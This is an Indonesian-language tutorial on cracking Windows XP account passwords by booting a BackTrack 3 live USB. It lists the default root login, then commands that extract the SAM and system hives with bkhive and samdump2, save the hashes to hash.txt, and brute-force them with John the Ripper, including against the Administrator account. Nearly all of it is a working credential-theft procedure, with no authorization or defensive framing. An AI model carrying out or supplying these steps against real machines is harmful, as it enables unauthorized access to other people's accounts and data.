Cracking Password Windows XP Menggunakan Linux Backtrack 3 beta
- Langkah pertama yg harus anda lakukan adalah memiliki Distro Linux Backtrack (BT), dalam tutorial ini saya menggunakan BackTrack 3 beta yang dijalankan lewat USB Flashdisk, tapi anda juga dapat menggunakan BT2, hanya saja letak tool yg digunakan ada sedikit perbedaan.
- Setting 1st Booting lewat USB Flashdisk/CDRom (jika menggunakan Live CD).
- Jika meminta User Login masukkan user="root" pass="toor" kemudian ketik "startx".
- Buka konsole (alt+f2) ketik "konsole", atau bisa langsung klik icon konsole.
- Pada dasarnya File penyimpanan password terletak pada C:\WINDOWS\system32\config\SAM. File inilah yg akan kita gunakan untuk mendapatkan password Win XP.
- Setelah konsole terbuka, ketik: "bkhive /mnt/sda1/WINDOWS/system32/config/system sam". Pastikan semua hardisk sudah ter-mount khusunya hardisk system Win XP. Biasanya untuk hardisk SATA, Drive C:\ Windows terletak pd /mnt/sda1 dan hardisk ATA/IDE terletak pada hda1, anda tinggal mengganti "/mnt/sda1" dengan "/mnt/hda1" atau yg lain sesuai dengan keadaan.
- Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam"
- Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam > hash.txt"
- Untuk melihat file hasil hash, ketik "cat hash.txt"
- Masuk ke direktori johntheripper, dengan mengetik "cd /usr/local/john-1.7.2"
- Lakukan cracking password bruteforce dengan perintah "john /root/hash.txt"
- Untuk mendapatkan password user tertentu menggunakan perintah "john /root/hash.txt --users=namauser" contoh: "john /root/hash.txt --users=Administrator"
- Tekan Enter untuk melihat aktivitas john.
- Jika semuanya berjalan lancar maka password akan segera anda dapatkan.
